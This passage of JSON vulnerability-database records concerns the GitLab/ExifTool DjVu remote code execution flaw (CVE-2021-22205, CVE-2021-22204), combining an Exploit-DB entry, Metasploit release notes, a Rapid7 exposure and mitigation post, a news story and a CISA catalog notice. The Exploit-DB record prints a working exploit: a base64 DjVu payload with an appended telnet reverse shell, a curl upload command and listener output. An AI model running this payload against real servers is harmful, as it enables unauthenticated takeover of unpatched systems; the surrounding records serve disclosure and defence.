"attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-17T00:00:00", "type": "exploitdb", "title": "GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-22205", "CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-17T00:00:00", "id": "EDB-ID:50532", "href": "https://www.exploit-db.com/exploits/50532", "sourceData": "# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)\r\n# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22\r\n# Date: 11/01/2021\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: https://about.gitlab.com/\r\n# Software Link: https://gitlab.com/gitlab-org/gitlab\r\n# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8\r\n# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)\r\n# CVE : CVE-2021-22205\r\n# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/\r\n# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed\r\n\r\nCode execution is the result of GitLab allowing remote unauthenticated 
attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.\r\n\r\n1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.\r\n\r\necho -e\r\n\"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=\"\r\n| base64 -d > lol.jpg\r\necho -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg\r\necho -n\r\n\"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==\"\r\n| base64 -d >> lol.jpg\r\n\r\n2. Sending the payload. Any random endpoint will do.\r\n\r\ncurl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)\r\n\r\n2a. 
Sample Output from the reverse shell:\r\n\r\n$ nc -lnvp 1270\r\nListening on [0.0.0.0] (family 0, port 1270)\r\nConnection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport\r\n34836)\r\nwhoami\r\ngit\r\nid\r\nuid=998(git) gid=998(git) groups=998(git)", "sourceHref": "https://www.exploit-db.com/download/50532", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-05-14T19:40:32", "description": "## Stopped at the gate?\n\n\n\n\n\nA fun new module from [timwr](<https://github.com/timwr>), taking advantage of a technique reported by [Cedric Owens](<https://twitter.com/cedowens>), is reminding everyone if there is no fence a gate will not deter us. The new module provides a quick wrapper for payloads that bypasses download origination and authorization requirements known as GateKeeper in MacOS 10.15+ to simply sidestep the gate when a user opens their gift.\n\n## Cookies are tastier if you pilfer them from the jar.\n\nRecent updates to how modules interact with cookies got a little more love baked in. This week [agalway-r7](<https://github.com/agalway-r7>) clarified the recipe a bit with documentation on various methods in the new API, and [adfoster-r7](<https://github.com/adfoster-r7>) came around and swept up any crumbs modules might leave behind.\n\n## New Module Content (2)\n\n * [macOS Gatekeeper check bypass](<https://github.com/rapid7/metasploit-framework/pull/15102>) by [Cedric Owens](<https://twitter.com/cedowens>) and [timwr](<https://github.com/timwr>), which exploits [CVE-2021-30657](<https://attackerkb.com/topics/MrqDl2L0CZ/cve-2021-30657-malicious-applications-may-bypass-gatekeeper-checks?referrer=blog>) \\- This adds the `exploit/osx/browser/osx_gatekeeper_bypass` module that exploits a vulnerability in MacOS versions `10.15` to `11.3` inclusive. The module generates an app that is missing an `Info.plist` file. 
When downloaded and executed by a user, the signed / notarization checks standard for downloaded files will be bypassed, granting code execution on the target.\n * [ExifTool DjVu ANT Perl injection](<https://github.com/rapid7/metasploit-framework/pull/15185>) by [Justin Steven](<https://github.com/justinsteven>) and [William Bowling](<https://twitter.com/wcbowling>), which exploits [CVE-2021-22204](<https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204?referrer=blog>) \\- A new module has been added which exploits CVE-2021-22204, an arbitrary Perl injection vulnerability within the DjVu module of ExifTool 7.44 to 12.23 that allows for RCE when parsing a malicious file containing a crafted DjVu ANT (Annotation) section.\n\n## Enhancements and features\n\n * [#15054](<https://github.com/rapid7/metasploit-framework/pull/15054>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Updates msfdb to work on additional platforms. Specifically Ubuntu through pg_ctlcluster, as well as existing or remote databases with the new `--connection-string` option. 
This option can be used to interact with docker PostgreSQL containers\n * [#15125](<https://github.com/rapid7/metasploit-framework/pull/15125>) from [1itt1eB0y](<https://github.com/1itt1eB0y>) \\- The `session_notifier.rb` plugin has been updated to support Gotify, allowing users to be notified of new sessions via Gotify notifications.\n * [#15158](<https://github.com/rapid7/metasploit-framework/pull/15158>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds tests for the auth brute mixin\n * [#15165](<https://github.com/rapid7/metasploit-framework/pull/15165>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Adds documentation for the new cookie jar implementation which is available for http-based modules\n * [#15175](<https://github.com/rapid7/metasploit-framework/pull/15175>) from [whokilleddb](<https://github.com/whokilleddb>) \\- The `rejetto_hfs_exec` module has been updated to replace calls to the deprecated `URI.encode` function with calls to the `URI::encode_www_form_component` function. This prevents users from being shown deprecation warnings when running the module.\n\n## Bugs Fixed\n\n * [#15149](<https://github.com/rapid7/metasploit-framework/pull/15149>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an edge case where cookies left over from one module run could impact the next module run\n * [#15171](<https://github.com/rapid7/metasploit-framework/pull/15171>) from [timwr](<https://github.com/timwr>) \\- The `lib/msf/core/post/common.rb` and `lib/msf/ui/console/command_dispatcher/core.rb` libraries have been updated to properly support passing timeouts to `session.sys.process.capture_output()`, allowing users to specify timeouts when executing commands on sessions. 
Previously these options would be ignored and a default timeout of 15 seconds would be used instead.\n * [#15179](<https://github.com/rapid7/metasploit-framework/pull/15179>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The `swagger-blocks` dependency has been marked as a default dependency for all installs, preventing cases where if a user did not install the `development` and `tests` groups, they would be unable to start the web service.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-05T09%3A27%3A49-04%3A00..2021-05-12T18%3A09%3A40-05%3A00%22>)\n * [Full diff 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/compare/6.0.43...6.0.44>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).\n\n * _Image credit: Steve F, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_", "cvss3": {}, "published": "2021-05-14T17:29:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22204", "CVE-2021-30657"], "modified": "2021-05-14T17:29:09", "id": "RAPID7BLOG:830105C5509FB1C4D38B114EDD71298E", "href": "https://blog.rapid7.com/2021/05/14/metasploit-wrap-up-111/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-01T15:03:07", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-22205 | [GitLab Advisory](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/>) | [AttackerKB](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog>) | Evaluating | ASAP | November 1, 2021 \n \n\n\nOn April 14, 2021, GitLab published a [security release](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/>) to address CVE-2021-22205, a critical remote code execution vulnerability in the service\u2019s web interface. At the time, GitLab described the issue as an authenticated vulnerability that was the result of passing user-provided images to the service\u2019s embedded version of ExifTool. A remote attacker could execute arbitrary commands as the `git` user due to ExifTool\u2019s mishandling of DjVu files, an issue that was later assigned [CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>).\n\nCVE-2021-22205 was initially assigned a CVSSv3 score of 9.9. 
However, on September 21, 2021 [GitLab revised](<https://gitlab.com/gitlab-org/cves/-/commit/29e8470a3704632adad0c6a97865bd2caea7b336>) the CVSSv3 score to 10.0. The increase in score was the result of changing the vulnerability from an authenticated issue to an unauthenticated issue. Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders. Rapid7\u2019s vulnerability research team has [a full root cause analysis of CVE-2021-22205](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog>) in AttackerKB.\n\nThere are multiple recently published public exploits for this vulnerability, and it reportedly has been [exploited in the wild](<https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/>) since June or July of 2021. We expect exploitation to increase as details of the unauthenticated nature of this vulnerability become more widely understood.\n\nAccording to [GitLab\u2019s April 2021 advisory](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/#Remote-code-execution-when-uploading-specially-crafted-image-files>), CVE-2021-22205 affects all versions of both GitLab Enterprise Edition (EE) and GitLab Community Edition (CE) starting from 11.9. The vulnerability was **patched** in the following versions:\n\n * 13.10.3\n * 13.9.6\n * 13.8.8\n\n## Versions in the wild\n\nAt the time of writing (October 31, 2021), patches have been available for GitLab for more than six months. However, analysis of internet-facing GitLab instances suggests that a large number are still vulnerable.\n\nWe can see just short of 60,000 internet-facing GitLab installations. Unfortunately, GitLab\u2019s web interface does not have an easy-to-extract version string. 
But by using the appearance of `application_utilities` [about a year ago](<https://gitlab.com/gitlab-org/gitlab/-/commit/3b87ee87165aed7840f4257f12c0acc185056cc5>) and then the migration of application_utilities into [loading hints](<https://gitlab.com/gitlab-org/gitlab/-/commit/a712e481804acd57d7dadca3c1c6cfba38438ec4>) header, we can break the internet-facing GitLab installs into three categories: unpatched, maybe patched, and patched.\n\nOf the 60,000 this is what we found:\n\n * 21% of installs are fully patched against this issue.\n * 50% of installs are not patched against this issue.\n * 29% of installs may or may not be vulnerable.\n\n## Mitigation guidance\n\nRapid7\u2019s emergent threat response team has a [full technical analysis of CVE-2021-22205](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog>) in AttackerKB, along with several ways for GitLab customers to determine whether they may be running vulnerable versions.\n\nGitLab users should upgrade to the latest version of GitLab as soon as possible. In addition, ideally, GitLab should not be an internet facing service. 
If you need to access your GitLab from the internet, consider placing it behind a VPN.\n\n## Rapid7 customers\n\nOur researchers are currently evaluating the feasibility of adding a vulnerability check for CVE-2021-22205.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-01T13:33:43", "type": "rapid7blog", "title": "GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-01T13:33:43", "id": "RAPID7BLOG:42058F70E3A275D52C950440A003EA6D", "href": "https://blog.rapid7.com/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-05T21:03:08", "description": "## GitLab RCE\n\n\n\nNew Rapid7 team member [jbaines-r7](<https://github.com/jbaines-r7>) wrote an exploit targeting GitLab via the ExifTool command. 
Exploiting this vulnerability results in unauthenticated remote code execution as the git user. What makes this module extra neat is the fact that it chains two vulnerabilities together to achieve this desired effect. The first vulnerability is in GitLab itself that can be leveraged to pass invalid image files to the ExifTool parser which contained the second vulnerability whereby a specially-constructed image could be used to execute code. For even more information on these vulnerabilities, check out Rapid7\u2019s [post](<https://www.google.com/url?q=https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/&sa=D&source=docs&ust=1636139578431000&usg=AOvVaw3-5j1puSInH2-QJ-QybXUC>).\n\n## Less Than BulletProof\n\nThis week community member [h00die](<https://github.com/h00die>) submitted another Wordpress module. This one leverages an information disclosure vulnerability in the Wordpress BulletProof Security plugin that can disclose user credentials from a backup file. These credentials could then be used by a malicious attacker to login to Wordpress if the hashed password is able to be cracked in an offline attack.\n\n## Metasploit Masterfully Manages Meterpreter Metadata\n\nEach Meterpreter implementation is a unique snowflake that often incorporates API commands that others may not. A great example of this are all the missing Kiwi commands in the Linux Meterpreter. Metasploit now has much better support for modules to identify the functionality they require a Meterpreter session to have in order to run. This will help alleviate frustration encountered by users when they try to run a post module with a Meterpreter type that doesn\u2019t offer functionality that is needed. 
This furthers the Metasploit project goal of providing more meaningful error information regarding post module incompatibilities which has been an ongoing effort this year.\n\n## New module content (3)\n\n * [Wordpress BulletProof Security Backup Disclosure](<https://github.com/rapid7/metasploit-framework/pull/15765>) by Ron Jost (Hacker5preme) and h00die, which exploits [CVE-2021-39327](<https://attackerkb.com/topics/0EEjQ5WNrl/cve-2021-39327?referrer=blog>) \\- This adds an auxiliary module that leverages an information disclosure vulnerability in the BulletproofSecurity plugin for Wordpress. This vulnerability is identified as CVE-2021-39327. The module retrieves a backup file, which is publicly accessible, and extracts user credentials from the database backup.\n * [GitLab Unauthenticated Remote ExifTool Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15816>) by William Bowling and jbaines-r7, which exploits [CVE-2021-22204](<https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204?referrer=blog>) and [CVE-2021-22205](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205?referrer=blog>) \\- This adds an exploit for an unauthenticated remote command injection in GitLab via a separate vulnerability within ExifTool. The vulnerabilities are identified as CVE-2021-22204 and CVE-2021-22205.\n * [WordPress Plugin Pie Register Auth Bypass to RCE](<https://github.com/rapid7/metasploit-framework/pull/15761>) by Lotfi13-DZ and h00die - This exploits an authentication bypass which leads to arbitrary code execution in versions `3.7.1.4` and below of the Wordpress plugin, `pie-register`. Supplying a valid admin id to the `user_id_social_site` parameter in a POST request now returns a valid session cookie. 
With that session cookie, a PHP payload as a plugin is uploaded and requested, resulting in code execution.\n\n## Enhancements and features\n\n * [#15665](<https://github.com/rapid7/metasploit-framework/pull/15665>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds additional metadata to exploit modules to specify Meterpreter command requirements. Metadata information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.\n * [#15782](<https://github.com/rapid7/metasploit-framework/pull/15782>) from [k0pak4](<https://github.com/k0pak4>) \\- This updates the iis_internal_ip module to include coverage for the PROPFIND internal IP address disclosure as described by CVE-2002-0422.\n\n## Bugs fixed\n\n * [#15805](<https://github.com/rapid7/metasploit-framework/pull/15805>) from [timwr](<https://github.com/timwr>) \\- This bumps the metasploit-payloads version to include two bug fixes for the Python Meterpreter.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.12...6.1.13](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-28T08%3A17%3A18-05%3A00..2021-11-04T08%3A10%3A58-05%3A00%22>)\n * [Full diff 6.1.12...6.1.13](<https://github.com/rapid7/metasploit-framework/compare/6.1.12...6.1.13>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-05T19:43:51", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0422", "CVE-2021-22204", "CVE-2021-22205", "CVE-2021-39327"], "modified": "2021-11-05T19:43:51", "id": "RAPID7BLOG:3F66B870CB36C9E127B4D6BB5B5FF37B", "href": "https://blog.rapid7.com/2021/11/05/metasploit-wrap-up-137/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTb5h9a7HgQYjqGGyu1IRlsXV6h_tKuOOWhc95Aj7yQIt9N54_EJ_Hs1Q1RiAGZ4m6Liai9fNdUdXMrQUOeGO7ZJHlzY-gAUgfrO5caOrLIfiym5Fh6alq-KXGrA1a-K661Du7Ce3s7oHusFNOOBnfshg2xlj25NgUuZAPWhI1oPLY4t5Uo1eHMlUP/s728-e100/vt.jpg>)\n\nSecurity researchers 
have disclosed a security issue that could have allowed attackers to weaponize the VirusTotal platform as a conduit to achieve remote code execution (RCE) on unpatched third-party sandboxing machines employed antivirus engines.\n\nThe flaw, now patched, made it possible to \"execute commands remotely within [through] VirusTotal platform and gain access to its various scans capabilities,\" Cysource researchers Shai Alfasi and Marlon Fabiano da Silva said in a [report](<https://www.cysrc.com/blog/virus-total-blog >) exclusively shared with The Hacker News.\n\n[VirusTotal](<https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works>), part of Google's Chronicle security subsidiary, is a malware-scanning service that analyzes suspicious files and URLs and checks for viruses using more than 70 third-party antivirus products.\n\nThe attack method involved uploading a DjVu file via the platform's [web user interface](<https://www.virustotal.com/gui/home/upload>) that when passed to multiple third-party malware scanning engines could trigger an exploit for a high-severity remote code execution flaw in [ExifTool](<https://en.wikipedia.org/wiki/ExifTool>), an open-source utility used to read and edit EXIF metadata information in image and PDF files.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhE2tELGfUlHBJVYWA6aiTzN28eiqkVNqUeGyO2lWmsp8bfN5XJ9Nbpy2sw1HC0y5ma198rdeM68TCAtvyWrmw1Al65eqkicNAa7gwwOwmXMp_RRPSYW92tNyF6UfNop4JgwBmwfc0ew7QhWWvnZUFmpK_yT7ngJvdRB-SXsWNNsYsSJqlco6_Ox7WT/s728-e100/vt-1.jpg>)\n\nTracked as [CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>) (CVSS score: 7.8), the high-severity [vulnerability](<https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html>) in question is a case of arbitrary code execution that arises from ExifTool's mishandling of DjVu files. 
The issue was patched by its maintainers in a [security update](<https://exiftool.org/ancient_history.html>) released on April 13, 2021.\n\nA consequence of such an exploitation, the researchers noted, was that it granted a reverse shell to affected machines linked to some antivirus engines that had not yet been patched for the remote code execution vulnerability.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgEhezW6T852Ei69pDtF3_i7j5Rdphi57DuUlDmouFjPhDEPj3yJL4iifHt9hQ_surgYplF_uoBPvlGUnrg9Y11McXa5331O5nsqq9eGtcgWoY1RcYZ9WMvF-x8uvq1Y4X1cTmty5Ky9pM0Gu4Q6dLB7L9xAa_ECzBZsUsJ3X3jcp4-lZFIVZjWgyBd/s728-e100/vt-2.jpg>)\n\nTo be noted, the vulnerability doesn't affect VirusTotal and in a statement shared with The Hacker News, Bernardo Quintero, its founder, confirmed that it's the intended behavior and that the code executions are not in the platform itself but in the third-party scanning systems that analyze and execute the samples. The company also said it's using a version of ExifTool that's not vulnerable to the flaw. \n\nCysource said it responsibly reported the bug through Google's Vulnerability Reward Programs ([VRP](<https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html>)) on April 30, 2021, following which the security weakness was immediately rectified.\n\nThis is not the first time the ExifTool flaw emerged as a conduit to achieve remote code execution. Last year, GitLab fixed a critical flaw ([CVE-2021-22205](<https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html>), CVSS score: 10.0) related to an improper validation of user-provided images, leading to arbitrary code execution.\n\n_**Update**: The story has been revised based on a statement from VirusTotal to clarify the nature of the exploitation._\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-25T20:00:00", "type": "thn", "title": "Researchers Takeover Unpatched 3rd-Party Antivirus Sandboxes via VirusTotal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2022-04-26T08:30:44", "id": "THN:01284F0D93C66B65A40DE129C767426B", "href": "https://thehackernews.com/2022/04/researchers-report-critical-rce.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-01-26T11:29:28", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), which require remediation from federal civilian executive branch (FCEB) agencies by December 1, 2021. 
CISA has evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise. \n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n[CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>) | Exiftool Remote Code Execution vulnerability | 12/01/2021 \n[CVE-2021-40449](<https://nvd.nist.gov/vuln/detail/CVE-2021-40449>) | Microsoft Win32k Elevation of Privilege | 12/01/2021 \n[CVE-2021-42292](<https://nvd.nist.gov/vuln/detail/CVE-2021-42292>) | Microsoft Excel Security Feature Bypass | 12/01/2021 \n[CVE-2021-42321](<https://nvd.nist.gov/vuln/detail/CVE-2021-42321>) | Microsoft Exchange Server Remote Code Execution | 12/01/2021 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. 
CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/cisa-adds-four-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "cisa", "title": "CISA Adds Four Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 